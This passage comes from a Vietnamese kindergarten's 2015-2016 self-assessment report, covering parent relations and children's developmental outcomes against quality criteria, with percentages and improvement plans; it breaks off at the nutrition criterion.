Kết luận: Tiêu chuẩn 4: Quan hệ giữa nhà trường, gia đình và xã hội 1. Điểm mạnh cơ bản

Nhà trường có thành lập 11 Ban đại diện cha mẹ trẻ em của lớp, Ban đại diện cha mẹ trẻ em của trường gồm 19 thành viên theo quy định của Điều lệ trường mầm non. Ban đại diện cha mẹ học sinh của trường hoạt động theo Điều lệ Ban đại diện cha mẹ học sinh. BGH nhà trường có các biện pháp và hình thức tuyên truyền, hướng dẫn cha mẹ trẻ chăm sóc, giáo dục trẻ khi ở nhà. Giáo viên có sự trao đổi thông tin thường xuyên về tình hình sức khỏe, ăn, ngủ, học tập của trẻ giữa nhà trường và gia đình. Nhà trường luôn chủ động trong công tác tham mưu với cấp ủy Đảng, chính quyền địa phương để đưa ra các chính sách phù hợp để nâng cao chất lượng chăm sóc, giáo dục trẻ.  Nhà trường có phối hợp với các tổ chức, đoàn thể, cá nhân hỗ trợ cây xanh cho nhà trường tạo cảnh quang xanh-sạch- đẹp, trang bị đồ dùng nấu bếp cho nhà trường.Vận động phụ huynh hỗ trợ hiện vật để phục vụ các hoạt động của nhà trường.

  1. Điểm yếu cơ bản

Còn một số phụ huynh chưa thường xuyên tham gia hội họp do hoàn cảnh kinh tế phải đi làm ăn xa, một số phụ huynh chưa quan tâm đến việc học tập của con em mình nên còn hạn chế trong vấn đề hội họp.

Hiệu quả phối hợp với các tổ chức đoàn thể, cá nhân chưa cao để huy động nguồn lực xây dựng cơ sở vật chất cho trường do chưa được sự quan tâm nhiều của các tổ chức đoàn thể, cá nhân về bậc học mầm non.

+ Số tiêu chí đạt: 2/2 tiêu chí

+ Số tiêu chí không đạt: 0 tiêu chí.

Tiêu chuẩn 5: Kết quả nuôi dưỡng, chăm sóc và giáo dục trẻ

Mở đầu: Trường Mầm non Phú Thành A là một trong những trường có chất lượng chăm sóc và giáo dục trẻ có uy tín trên địa bàn được phụ huynh trong và ngoài xã tin tưởng gửi con. Trong xu thế hội nhập toàn cầu, trường đã có nhiều đổi mới trong công tác quản lí, phương pháp dạy học nhằm đáp ứng nhu cầu của xã hội cũng như nguyện vọng của học sinh và cha mẹ học sinh. Trong nhiều năm qua, tập thể lãnh đạo và CBVC nhà trường đã nỗ lực thực hiện các nhiệm vụ chiến lược, mang lại nhiều thay đổi tích cực, kết quả đáng khích lệ trong các hoạt động giáo dục, phát triển đội ngũ, tăng cường chất lượng chăm sóc giáo dục trẻ.

Tiêu chí 1:  Trẻ có sự phát triển về thể chất phù hợp với độ tuổi.

  1. a) Chiều cao, cân nặng, phát triển bình thường;
  2. b) Thực hiện được các vận động cơ bản, có khả năng phối hợp các giác quan và vận động;
  3. c) Có khả năng làm được một số việc tự phục vụ trong ăn, ngủ, vệ sinh cá nhân, có kỹ năng tốt trong ăn uống, giữ gìn sức khỏe;
  4. Mô tả hiện trạng

Năm học 2015-2016 nhà trường quan tâm thực hiện việc chăm sóc trẻ, tổ chức các hoạt động ăn, ngủ, vệ sinh, các hoạt động giúp trẻ phát triển thể chất từ đó đa số trẻ có chiều cao, cân nặng phát triển bình thường theo từng độ tuổi. Đến tháng 05/2016 toàn trường có 400/400 trẻ có cân nặng phát triển bình thường đạt tỉ lệ 100%, có 396/400 trẻ đạt chiều cao bình thường tỉ lệ 99%. Còn 2 trẻ SDD chiều cao, cân nặng chiếm tỉ lệ 0,5%. Giảm 10 trẻ so với đầu năm tỷ lệ 2,5%. (Trong đó 4 trẻ SDD chiều cao chiếm tỉ lệ 1% và 02 trẻ SDD cả 2 chiếm tỉ lệ 0,5 %). H5.5.01.01].

Toàn trường có 400 trẻ thực hiện được các bài tập vận động cơ bản như đi, chạy, nhảy, leo trèo, ném, tung, bắt, bò trườn… có khả năng phối hợp các giác quan và vận động. Trong đó 39/47 trẻ nhà trẻ đạt 82,97%, có 51/58 trẻ 3-4 tuổi đạt 87,93%, có 103/111 trẻ 4- 5 tuổi đạt 92,79% riêng trẻ 5-6 tuổi có 163/184 đạt 88,58% đạt được các các yêu cầu về các động tác phát triển nhóm cơ và hô hấp, các vận động cơ bản và phát triển tố chất vận động ban đầu, cử động của các bàn tay, ngón tay và phối hợp tay mắt theo kết quả mong đợi về giáo dục thể chất trong chương trình GDMN đối với trẻ nhà trẻ, lớp Mầm, Chồi và Bộ chuẩn phát triển trẻ em 5 tuổi đối với khối Lá. Còn 17,03% trẻ nhà trẻ và 10,2% trẻ mẫu giáo chưa thực hiện tốt các vận động cơ bản. [H5.5.01.02].

Giáo viên thường xuyên hướng dẫn trẻ thực hiện một số thao tác lao động tự phục vụ đơn giản, các kỹ năng cơ bản trong ăn uống. Kết quả, có 372/400 trẻ bán trú đạt 93% trẻ có khả năng làm được một số việc tự phục vụ trong ăn ngủ vệ sinh cá nhân kỹ năng tự phục vụ như tự múc thức ăn từ bàn chia thức ăn của cô, thu dọn tô, muỗng, bàn ghế sau khi ăn, tự lấy và thu dọn đồ dùng cá nhân sau trước và sau khi ngủ dậy, tự rửa mặt, rửa tay, đánh răng và xếp quần áo của mình. Có kỹ năng tốt trong ăn, uống, giữ gìn sức khỏe phù hợp với độ tuổi: Không làm rơi vãi thức ăn ra ngoài, không nói chuyện trong giờ ăn, không ăn những thức ăn có hại cho sức khỏe, mặc quần áo phù hợp với thời tiết, với bản thân. Còn 7% trẻ từ 3 đến 5 tuổi kỹ năng vận động cơ bản và khả năng phối hợp các giác quan còn hạn chế. Kỹ năng tự phục vụ của trẻ chưa tốt do trẻ chưa quen thuộc với các kỹ năng tự phục vụ trong ăn, ngủ, vệ sinh cá nhân. [H5.5.01.03].

  1. Điểm mạnh

Có 100% trẻ cân nặng phát triển bình thường đạt tỉ lệ 100% và 396 trẻ đạt chiều cao tỉ lệ 99%. Có 372/400 đạt 93% trẻ có khả năng thực hiện được một số kỹ năng tự phục vụ khi ăn, ngủ, vệ sinh, có kỹ năng trong ăn uống và giữ gìn sức khỏe.

  1. Điểm yếu

Còn 17,03% trẻ nhà trẻ và 10,2% trẻ từ 3 đến 5 tuổi kỹ năng vận động cơ bản và khả năng phối hợp các giác quan còn hạn chế. Kỹ năng tự phục vụ của trẻ chưa tốt do trẻ chưa quen thuộc với các kỹ năng tự phục vụ trong ăn, ngủ, vệ sinh cá nhân.

  1. Kế hoạch cải tiến chất lượng

Giáo viên có kế hoạch tạo điều kiện cho các trẻ còn hạn chế về các kỹ năng vận động phối hợp các giác quan được thường xuyên luyện tập, thực hành. Thường xuyên hướng dẫn và yêu cầu trẻ tự thực hiện một số công việc tự phục vụ cho bản thân trong ăn, uống, vệ sinh cá nhân. Phối hợp cùng phụ huynh hỗ trợ, hướng dẫn trẻ thực hiện đến cuối năm học 2016- 2017.

  1. Tự đánh giá: Đạt

Tiêu chí 2: Trẻ có sự phát triển về nhận thức phù hợp với độ tuổi

  1. a) Thích tìm hiểu, khám phá thế giới xung quanh;
  2. b) Có sự nhạy cảm, có khả năng quan sát, ghi nhớ, so sánh, phán đoán, phát hiện và giải quyết vấn đề;
  3. c) Có một số hiểu biết ban đầu về bản thân, về con người, sự vật, hiện tượng xung quanh và một số khái niệm.
  4. Mô tả hiện trạng

Theo từng chủ đề giáo viên luôn lên kế hoạch đầy đủ để giúp trẻ phát triến nhận thức, khuyến khích trẻ tìm hiểu khám phá thế giới xung quanh qua tranh ảnh, video, qua việc trải nghiệm thực tế để trẻ nói lên nhận xét của mình về những điều trẻ nhìn thấy và trải nghiệm được. Trong đó có 43/47 trẻ nhà trẻ đạt 91,48%, 54/58 đạt 93,10% trẻ 3-4 tuổi, 101/111 đạt 90,99% trẻ 4- 5 tuổi và 181/184 đạt 98,36% trẻ 5- 6 tuổi trẻ thích tìm hiểu khám phá thế giới xung quanh, còn 8,52% trẻ nhà trẻ, 6,9% trẻ 3 – 4 tuổi, 9,01% trẻ 4- 5 tuổi và 1,64% trẻ 5- 6 tuổi trẻ chưa thật quan tâm, thích khám phá thế giới xung quanh do trẻ còn nhút nhát và đôi lúc giáo viên chưa chuẩn bị tốt môi trường cho trẻ hoạt động [H5.5.01.02].

Qua các hoạt động đa số trẻ đã thể hiện được khả năng quan sát, ghi nhớ, so sánh, phán đoán phát hiện và giải quyết vấn đề như: Nhận ra sự thay đổi của cô, của bạn so với ngày hôm trước, ghi nhớ những nội dung cô cho trẻ hoạt động trong ngày, so sánh sự giống và khác nhau giữa hai đồ vật, con vật…, phán đoán được sự việc sẽ xảy ra khi có sự gợi ý của người lớn về một sự việc cụ thể, phát hiện và giải quyết vấn đề phù hợp với độ tuổi như: Trẻ được quan sát, ghi nhớ sự hình thành của các loài động, thực vật. Sự hình thành của cây qua các tiết học phát triển về nhận thức, qua đó có 385 trẻ biết so sánh sự giống và khác của các con vật, to- nhỏ, cao-  thấp [H5.5.01. 02]

Có 95% trẻ có một số hiểu biết ban đầu về bản thân, về con người, sự vật, hiện tượng xung quanh và một số khái niệm phù hợp với độ tuổi như: Trẻ nói đúng tên, tuổi, ngày sinh, giới tính của bản thân. Nói được đặc điểm cơ bản của con người, trẻ thích tìm tòi, khám phá những đồ dùng đồ chơi mới, các sự vật hiện tượng xung quanh, trẻ thích khám phá những cái mới hay những gì trẻ chưa biết như đặt câu hỏi về sự vật, hiện tượng: Tại sao có mưa? Vì sao lại có ngày và đêm?. Còn 20 trẻ tỉ lệ 5% trẻ nhóm nhà trẻ và mẫu giáo 3, 4 tuổi việc khám phá hiểu biết ban đầu về bản thân, về con người, sự vật, hiện tượng xung quanh và một số khái niệm còn hạn chế H5.5.01. 02].

  1. Điểm mạnh

Có 43/47 trẻ nhà trẻ đạt 91,48%, 54/58 đạt 93.10% trẻ 3-4 tuổi, 101/111 đạt 90,99% trẻ 4- 5 tuổi và 181/184 đạt 98,36% trẻ 5- 6 tuổi trẻ thích tìm hiểu khám phá thế giới xung quanh do giáo viên tổ chức cho trẻ các hoạt động khám phá thế giới xung quanh một cách sinh động và cho trẻ trải nghiệm thực tế từ đó trẻ thích tìm hiểu, khám phá thế giới xung quanh. Trẻ có sự nhạy cảm, có khả năng quan sát, ghi nhớ, so sánh, phán đoán và giải quyết vấn đề phù hợp với độ tuổi thông qua các hoạt động trong ngày. Trẻ hiểu biết ban đầu về bản thân, về con người, sự vật, hiện tượng xung quanh và một số khái niệm phù hợp với độ tuổi.

  1. Điểm yếu

Còn 8,52% trẻ nhà trẻ, 6,9% trẻ 3 – 4 tuổi chưa thật quan tâm, thích khám phá thế giới xung quanh do trẻ còn nhút nhát và đôi lúc giáo viên chưa chuẩn bị tốt môi trường cho trẻ hoạt động.

Kế hoạch cải tiến chất lượng

Hiệu trưởng thường xuyên nhắc nhở giáo viên thường xuyên chú ý đến những trẻ còn hạn chế về hiểu biết ban đầu để cung cấp những kiến thức, kỹ năng cho trẻ nắm vững và thường xuyên ôn luyện cho trẻ đặc biệt là trẻ nhà trẻ và mẫu giáo 3-4 tuổi trong năm học 2016-2017.

  1. Tự đánh giá: Đạt

 Tiêu chí 3: Trẻ có sự phát triển về ngôn ngữ phù hợp với độ tuổi.

  1. a) Nghe và hiểu được các lời nói trong giao tiếp hằng ngày;
  2. b) Có khả năng diễn đạt sự hiểu biết, tình cảm, thái độ bằng lời nói;
  3. c) Có một số kỹ năng ban đầu về đọc và viết.
  4. Mô tả hiện trạng

Có 42/47 trẻ đạt 89,36% trẻ nhà trẻ, 52/58 trẻ đạt 89,65% trẻ 3-4 tuổi, 104/111 trẻ đạt 93,69% trẻ 4-5 tuổi và 182/184 trẻ 98,91% trẻ 5-6 tuổi trẻ có khả năng nghe và hiểu được các lời nói giao tiếp hàng ngày, chỉ dẫn phù hợp với độ tuổi như: Trẻ biết lắng nghe và hiểu được lời nói của người đối thoại, biết phản hồi lại bằng những hành động hoặc lời nói phù hợp trong các hoạt động vui chơi, hoạt động học, trong sinh hoạt hàng ngày, thực hiện được các yêu cầu trong hoạt động tập thể. Trẻ nhà trẻ, 3,4 tuổi có thể lắng nghe và thực hiện được một số yêu cầu đơn giản của cô và trả lời được các câu hỏi của người đối diện. Còn 10,64% trẻ nhà trẻ, 10,35% trẻ 3-4 tuổi, 6,31% trẻ 4-5 tuổi và 1,09% trẻ 5-6 tuổi trẻ có khả năng nghe và hiểu được các lời nói giao tiếp hàng ngày H5.5.01. 02].

Trẻ có khả năng diễn đạt sự hiểu biết tình cảm, thái độ, sử dụng lời nói để giao tiếp cho người khác hiểu. Có 384/400 đạt 95,75% trẻ có khả năng diễn đạt sự hiểu biết, tình cảm về môi trường xung quanh, môi trường xã hội… thông qua sử dụng lời nói hoặc cử chỉ phù hợp với độ tuổi. Còn 17/400 chiếm 4,25% trẻ nhút nhát nên khả năng diễn đạt còn hạn chế, chưa tự tin giao tiếp với người khác nên vẫn còn lúng túng khi diễn đạt mong muốn, tình cảm của bản thân vì thế lời nói chưa rõ ràng, mạch lạc H5.5.01. 02].

Năm học 2015-2016 có 362/400 trẻ đạt 90,05% trẻ có một số kỹ năng cơ bản ban đầu về đọc và viết phù hợp với độ tuổi như: Trẻ 3, 4 tuổi thích vẽ nguệch ngoạc; trẻ 5 tuổi biết cách “đọc sách” từ trái sang phải, từ trên xuống dưới và nhận dạng được các chữ cái trong bảng chữ cái tiếng Việt; đọc từ trái sang phải, từ trên xuống dưới, biết cách viết đúng chiều chữ cái in mờ, viết đúng theo thứ tự từ trái sang phải, từ trên xuống dưới theo yêu cầu bài tập của cô phù hợp với độ tuổi. Còn 38/400 trẻ chiếm 9,95 %  chưa có kỹ năng đọc viết [H5.5.01. 02].

  1. Điểm mạnh

Có 42/47 trẻ đạt 89,36% trẻ nhà trẻ, 52/58 trẻ đạt 89,65% trẻ 3-4 tuổi, 104/111 trẻ đạt 93,69% trẻ 4-5 tuổi và 177/184 trẻ 96,19% trẻ 5-6 tuổi trẻ có khả năng nghe và hiểu được các lời nói giao tiếp hàng ngày mạnh dạn giao tiếp và hiểu được những lời giao tiếp với bạn bè và những người quen, được phát triển ngôn ngữ.Trẻ nghe hiểu được các lời nói, diễn đạt được bằng lời nói và biết sử dụng lời nói để giao tiếp với mọi người. Trẻ biết thể hiện cảm xúc của bản thân qua lời nói, cử chỉ, điệu bộ phù hợp với khả năng của bản thân. Cuối năm học, các cháu ở độ tuổi 5 tuổi đều biết nhận ra chữ cái, tô và đồ các nét chữ, sao chép một số ký hiệu, chữ cái đây cũng là hành trang để chuẩn bị cho trẻ bước vào lớp 1.

  1. Điểm yếu

Còn 10,64% trẻ nhà trẻ, 10,35% trẻ 3-4 tuổi, 3,31% trẻ 4-5 tuổi và 3.81% trẻ 5-6 tuổi trẻ có khả năng nghe và hiểu được các lời nói giao tiếp hàng ngày.

Còn 38/400 chiếm 9,95% trẻ nhút nhát nên khả năng diễn đạt còn hạn chế. Do trẻ mới lần đầu tiên đến trường lớp, nên trẻ còn nhút nhát.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng thường xuyên nhắc nhở giáo viên phối hợp với phụ huynh thường xuyên động viên và khuyến khích trẻ mạnh dạn, tự tin trong giao tiếp, trò chuyện với trẻ thường xuyên, tạo điều kiện cho trẻ được nói trước nhiều người, trao đổi với trẻ để trẻ nhầm phát triển về ngôn ngữ đến cuối năm học.

  1. Tự đánh giá: Đạt

          Tiêu chí 4: Trẻ có sự phát triển về thẩm mỹ phù hợp với độ tuổi

  1. a) Chủ động, tích cực, hứng thú tham gia các hoạt động văn nghệ;
  2. b) Có một số kỹ năng cơ bản trong hoạt động âm nhạc và tạo hình phù;
  3. c) Có khả năng cảm nhận và thể hiện cảm xúc trong các hoạt động âm nhạc và tạo hình.
  4. Mô tả hiện trạng

Trẻ ở tất cả các độ tuổi chủ động, tích cực, hứng thú khi tham gia các hoạt động văn nghệ do lớp, trường tổ chức phù hợp với độ tuổi như văn nghệ Tết trung thu, ngày Nhà giáo Việt Nam, Ngày hội đến trường của bé, Ngày hội ra trường của bé và văn nghệ cuối mỗi chủ đề [H5.5.04.01].

Có 387/400 trẻ đạt 96,75% trẻ chủ động, có một số kĩ năng cơ bản về âm nhạc như: Lắc lư, minh họa theo lời bài hát hoặc bắt chước các âm thanh, dáng điệu của các bài hát, múa trong buổi biểu diễn đối với trẻ 5 tuổi, trẻ có các kỹ năng tạo hình phù hợp với độ tuổi (vẽ, tô màu, cắt, xé dán…). trẻ 3, 4 tuổi biết phối hợp các nguyên vật liệu tạo hình, vật liệu thiên nhiên để tạo thành sản phẩm, vẽ, xé, cắt,  phối hợp các nét thẳng, xiên, ngang, cong tròn tạo thành bức tranh có màu sắc và bố cục, sử dụng các kĩ năng: Lăn dọc, xoay tròn, ấn dẹt đất nặn để tạo thành các sản phẩm; trẻ 5 tuổi có khả năng phối hợp các kĩ năng vẽ, cắt, xé dán để tạo thành bức tranh có màu sắc hài hòa, bố cục cân đối, phối hợp các kĩ năng nặn, xếp hình để tạo thành các sản phẩm có màu sắc hài hòa, bố cục cân đối. Tuy nhiên 3,25% trẻ vẫn còn hạn chế về kỹ năng tạo hình như: Thực hiện nặn chưa rõ các hình dáng cơ bản theo yêu cầu, vẽ, xé dán các bộ phận, bố cục tranh chưa cân đối, hát chưa đúng nhịp [H5.5.01.02].

Nhà trường, giáo viên thường xuyên tổ chức các hoạt động: Âm nhạc và tạo hình phù hợp với độ tuổi, có 360/400 trẻ đạt 90%  trẻ biết vận động nhịp nhàng phù hợp với sắc thái nhịp điệu bài hát với các hình thức, trẻ có thể nói lên ý tưởng và tạo ra các sản phẩm tạo hình theo ý thích. Còn một số ít trẻ Nhà trẻ chưa thể hiện cảm xúc trong các hoạt động âm và trẻ mẫu giáo 3-4 tuổi kỹ năng tạo hình chưa tốt như: Hát chưa đúng nhịp, kỹ năng vận động theo nhạc chưa đúng, tô màu chưa đẹp, tô lan ra ngoài, bố cục bức tranh chưa hài hòa, chưa cân đối [H5.5.01.02].

  1. Điểm mạnh

Nhà trường có 387/400 trẻ đạt 96,75% trẻ tổ chức đầy đủ các hoạt động nghệ thuật giúp trẻ phát triển năng khiếu, trẻ hứng thú, tích cực tham gia các hoạt động nghệ thuật có một số kỹ năng cơ bản về âm nhạc và tạo hình. Trẻ có khả năng cảm nhận và thể hiện cảm xúc trong các hoạt động âm nhạc và tạo hình phù hợp với độ tuổi.

  1. Điểm yếu

Còn 10% trẻ Nhà trẻ, mẫu giáo có kỹ năng âm nhạc và trẻ mẫu giáo kỹ năng tạo hình chưa tốt như: Hát chưa đúng nhịp, kỹ năng vận động theo nhạc chưa đúng, tô màu chưa đẹp, tô lan ra ngoài, bố cục bức tranh chưa hài hòa, chưa cân đối do bẩm sinh hoặc di truyền về khả năng cảm nhận nghệ thuật.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng thường xuyên nhắc nhở giáo viên tăng cường rèn luyện thêm cho trẻ mọi lúc mọi nơi để trẻ hát đúng nhịp, kỹ năng vận động theo nhạc tốt, tô màu cân đối, hài hòa theo bố cục và có tính thẩm mỹ cao, thời gian thực hiện đến cuối năm học 2016-2017.

  1. Tự đánh giá: Đạt

Tiêu chí 5: Trẻ có sự phát triển về tình cảm và kỹ năng xã hội phù hợp với độ tuổi

  1. a) Tự tin, biết bày tỏ cảm xúc và ý kiến cá nhân;
  2. b) Thân thiện, chia sẻ, hợp tác với bạn bè trong các hoạt động sinh hoạt, vui chơi, học tập;
  3. c) Mạnh dạn trong giao tiếp với những người xung quanh, lễ phép với người lớn.
  4. Mô tả hiện trạng

Có 38/47 trẻ đạt 80,85% trẻ nhà trẻ, 51/58 trẻ đạt 87,93% trẻ 3 – 4 tuổi, 102/111 trẻ đạt 91,89% trẻ 4- 5 tuổi và 182/184 trẻ đạt 98,81% trẻ 5- 6 tuổi tự tin, biết bày tỏ cảm xúc và ý kiến cá nhân phù hợp với độ tuổi. Giáo viên luôn khuyến khích trẻ tự tin về bản thân: Trẻ nhà trẻ mới đến trường còn nhút nhát nhưng dần về sau trẻ càng tham gia các hoạt động và bày tỏ ý kiến cá nhân, trẻ 3, 4 tuổi mạnh dạn tham gia vào các hoạt động do cô và các bạn tổ chức, trả lời theo yêu cầu của cô, trẻ 5 tuổi còn có thể tự làm một số việc đơn giản hàng ngày: vệ sinh cá nhân, trực nhật cùng bạn… biết bày tỏ cảm xúc của mình: Vui, buồn, ngạc nhiên… với các sự vật hiện tượng xung quanh trẻ, biết nhận xét các sự vật hiện tượng gần gũi theo các gợi ý của cô, tham gia phát biểu ý kiến trong giờ trò chuyện, trong hoạt động học, trong các hoạt động dạo chơi và các hoạt động khác trong ngày. Vẫn còn 19,15% trẻ 3 – 4 tuổi, 12,07% trẻ 4-5 tuổi và 3,81% trẻ 5-6 tuổi trẻ chưa tự tin bày tỏ cảm xúc cũng như nêu ý kiến của bản thân do trẻ nhút nhát [H5.5.01.02].

Có 98% trẻ thân thiện, chia sẻ, hợp tác với bạn bè trong các hoạt động sinh hoạt, vui chơi, học tập phù hợp với độ tuổi như: Trẻ nhà trẻ, 3 tuổi cùng tham gia chơi với các bạn trong nhóm; trẻ 4, 5 tuổi biết quan tâm tới mọi người xung quanh, biết nhường nhịn đồ chơi cho bạn, biết chia sẻ đồ dùng học tập cho bạn, biết chơi cùng bạn trong nhóm, lớp, đoàn kết giúp đỡ nhau, biết lắng nghe ý kiến, trao đổi, thỏa thuận, chia sẻ kinh nghiệm với các bạn trong nhóm chơi [H5.5.01.02].

Giáo viên thường xuyên giáo dục trẻ mạnh dạn tự tin trong giao tiếp với những người xung quanh, biết chào hỏi, lễ phép với mọi người, trẻ thể hiện thông qua các tiết dạy, qua việc thực hiện chuyên đề giáo dục kỹ năng sống cho trẻ. 80% trẻ mạnh dạn trong giao tiếp với những người xung quanh, lễ phép với người lớn phù hợp với độ tuổi như: chào hỏi khách đến lớp, chào hỏi người lớn, biết chào bạn, chào cô [H5.5.01.02].

  1. Điểm mạnh

Trẻ mẫu giáo đạt 102/111 trẻ đạt 91,89% trẻ 4- 5 tuổi và 182/184 trẻ đạt 98,81% trẻ 5- 6 tuổi trẻ thể hiện sự tự tin, biết bày tỏ ý kiến cá nhân, mạnh dạn phát biểu, tích cực tham gia các hoạt động của lớp. Biết đoàn kết, chia sẻ, hợp tác, nhường nhịn bạn trong khi chơi và chơi với nhau một cách vui vẽ, thân thiện. Hầu hết các trẻ luôn biết chào hỏi khi có khách đến lớp, gần gũi, thân thiện trong giao tiếp. Biết thể hiện sự lễ phép với người thân và những người xung quanh bé.

  1. Điểm yếu

Vẫn còn 19,15% trẻ nhà trẻ 12,07%  3-4 tuổi trẻ chưa tự tin bày tỏ cảm xúc cũng như nêu ý kiến của bản thân do trẻ nhút nhát do trẻ còn ngại tiếp xúc với mọi người, ảnh hưởng tâm lý lứa tuổi nên chưa mạnh dạn trong giao tiếp.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng thường xuyên nhắc nhở giáo viên thường xuyên trò chuyện nhiều với các cháu nhút nhát, tổ chức cho các lớp trong khối giao lưu với nhau để trẻ mạnh dạn tự tin. Thời gian thực hiện cuối năm học 2016-2017.

  1. Tự đánh giá: Đạt

Tiêu chí 6: Trẻ có ý thức về vệ sinh, môi trường và an toàn giao thông phù hợp với độ tuổi;

  1. a) Có ý thức giữ gìn vệ sinh môi trường lớp học, gia đình và những nơi công cộng, có nền nếp, thói quen vệ sinh cá nhân;
  2. b) Quan tâm, thích được chăm sóc, bảo vệ cây xanh và vật nuôi;
  3. c) Có ý thức chấp hành những quy định về an toàn giao thông đã được hướng dẫn.
  4. Mô tả hiện trạng

Có 373/400 trẻ đạt 93,25% trẻ có ý thức giữ gìn vệ sinh môi trường lớp học, gia đình và những nơi công cộng, có nề nếp, thói quen vệ sinh cá nhân phù hợp với độ tuổi như: Biết vứt rác vào thùng rác, không tô bậy ra nền nhà, tường nhà, ra bàn, ghế, không vứt vỏ hộp sữa, vỏ bánh kẹo ra sân trường, biết rửa tay bằng xà phòng trước khi ăn và sau khi đi vệ sinh, biết đánh răng sau khi ăn. Bên cạnh đó vẫn còn 6,75% trẻ còn quên lời cô dặn nên chưa bỏ rác vào đúng nơi quy định và còn vẽ lên tường, quên rửa tay trước khi ăn [H5.5.06.01].

Có 379/400 trẻ đạt 94,75% thích được chăm sóc, bảo vệ cây xanh, hàng ngày trẻ được trải nghiệm việc này thông qua hoạt động chơi ở vườn trường. Ở đây, trẻ sẽ làm những công việc đơn giản như: Nhổ cỏ, xới đất, tưới nước cho cây…., rau. Trong trường không có nuôi con vật nhưng qua các hoạt động dạy học trên lớp, qua trao đổi với phụ huynh biết trẻ thích chăm sóc và bảo vệ vật nuôi ở gia đình, ở xung quanh [H5.5.06.02].

Có 353/400 trẻ đạt 88,25% có ý thức chấp hành tốt những qui định về an toàn giao thông đã được hướng dẫn phù hợp với độ tuổi như: Biết được công dụng của ba đèn tín hiệu giao thông, phải đội mũ bảo hiểm khi ngồi trên xe máy, ra đường phải có người lớn đi cùng. Còn 11,75% chưa có ý thức chấp hành tốt những qui định về an toàn giao thông [H5.5.06.03].

  1. Điểm mạnh

Có 379/400 trẻ đạt 94,75% có ý thức giữ gìn vệ sinh môi trường lớp học, gia đình và những nơi công cộng, có nề nếp, thói quen vệ sinh cá nhân phù hợp với độ tuổi như: Biết vứt rác vào thùng rác, không tô bậy ra nền nhà, tường nhà, ra bàn, ghế, không vứt vỏ hộp sữa, vỏ bánh kẹo ra sân trường, biết rửa tay bằng xà phòng trước khi ăn và sau khi đi vệ sinh, biết đánh răng sau khi ăn

  1. Điểm yếu

Còn 11,75% chủ yếu nhà trẻ, mầm, nhóm trẻ cộng đồng chưa có ý thức chấp hành tốt những qui định về an toàn giao thông do trẻ mới đến lớp và gia đình chưa thường xuyên chú ý nội dung này cho trẻ.

  1. Kế hoạch cải tiến chất lượng

Giáo viên chú ý thường xuyên nhắc nhở, giáo dục trẻ biết bỏ rác vào thùng, không vẽ bậy lên tường, cần rửa tay ngay sau khi nhặt rác…giáo dục trẻ ở mọi lúc mọi nơi để đảm bảo vệ sinh cá nhân, vệ sinh môi trường. Thời gian thực hiện đến cuối năm học 2016-2017.

5.Tự đánh giá: Đạt

Tiêu chí 7: Trẻ được theo dõi và đánh giá thường xuyên.

  1. a) Tỷ lệ chuyên cần của trẻ 5 tuổi đạt ít nhất 80% đối với miền núi, vùng sâu, vùng xa, hải đảo và đạt ít nhất 90% đối với các vùng khác; tỷ lệ chuyên cần của trẻ ở các độ tuổi khác đạt ít nhất 75% đối với miền núi, vùng sâu, vùng xa, hải đảo và đạt ít nhất 85% đối với các vùng khác;
  2. b) Có ít nhất 98% trẻ 5 tuổi hoàn thành chương trình giáo dục mầm non;
  3. c) Có 100% trẻ 5 tuổi được theo dõi đánh giá theo bộ chuẩn phát triển trẻ 5 tuổi.
  4. Mô tả hiện trạng

Năm học 2015-2016 trường có 6 lớp mẫu giáo 5 tuổi với tổng số học sinh là 184 trẻ, có 184/184 trẻ chuyên cần đạt 100%. Các trẻ dưới 4 tuổi có 216/216 đạt tỷ lệ chuyên cần 100%. [H5.5.07.01].

Năm học vừa qua có 182/184 trẻ, tỷ lệ: 98,91% hoàn thành chương trình giáo dục mầm non [H5.5.07.02].

Toàn trường có 184/184 trẻ 5 tuổi được theo dõi đánh giá theo Bộ chuẩn phát triển trẻ em 5 tuổi, tỷ lệ 100%. Trẻ được theo dõi đánh giá qua các hoạt động hàng ngày, qua các chủ đề, bên cạnh đó còn kết hợp đánh giá trẻ qua thông tin từ phụ huynh. Tuy nhiên một số phụ huynh do bận công việc nên chưa kết hợp chặt chẽ với giáo viên trong việc đánh giá trẻ theo Bộ chuẩn phát triển trẻ em 5 tuổi [H5.5.07.03].

  1. Điểm mạnh

Có 184/184 trẻ đi học chuyên cần đạt tỉ lệ 100%. Các trẻ dưới 4 tuổi có 216/216 đạt tỷ lệ chuyên cần 100% đạt chỉ tiêu theo quy định. Có 98,91% trẻ 5 tuổi hoàn thành Chương trình giáo dục mầm non. Có 100% trẻ 5 tuổi được đánh giá theo bộ chuẩn phát triển trẻ em 5 tuổi theo qui định.

  1. Điểm yếu

Còn một số phụ huynh do bận công việc nên chưa kết hợp chặt chẽ với giáo viên trong việc đánh giá trẻ theo Bộ chuẩn phát triển trẻ em 5 tuổi.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng thường xuyên chỉ đạo giáo viên duy trì kết quả đạt được và  kết hợp chặt chẽ với phụ huynh trong việc đánh giá trẻ theo bộ chuẩn thông qua các cuộc họp, sổ liên lạc, giờ đón trẻ, trả trẻ, bản tin của lớp, tuyên truyền đến phụ huynh nắm bắt và thực hiện đến cuối năm học 2016- 2017.

  1. Tự đánh giá: Đạt

Tiêu chí 8: Trẻ suy dinh dưỡng, béo phì và trẻ khuyết tật được quan tâm chăm sóc.

  1. a) 100% trẻ bị suy dinh dưỡng được can thiệp bằng các biện pháp nhằm cải thiện tình trạng dinh dưỡng; có biện pháp hạn chế tốc độ tăng cân và bảo đảm sức khỏe cho trẻ béo phì;
  2. b) Tỷ lệ trẻ suy dinh dưỡng thể nhẹ cân (cân nặng theo tuổi), thể thấp còi (chiều cao theo tuổi) đều dưới 10%;
  3. c) Ít nhất 80% trẻ khuyết tật học hòa nhập (nếu có) được đánh giá có tiến bộ.
  4. Mô tả hiện trạng

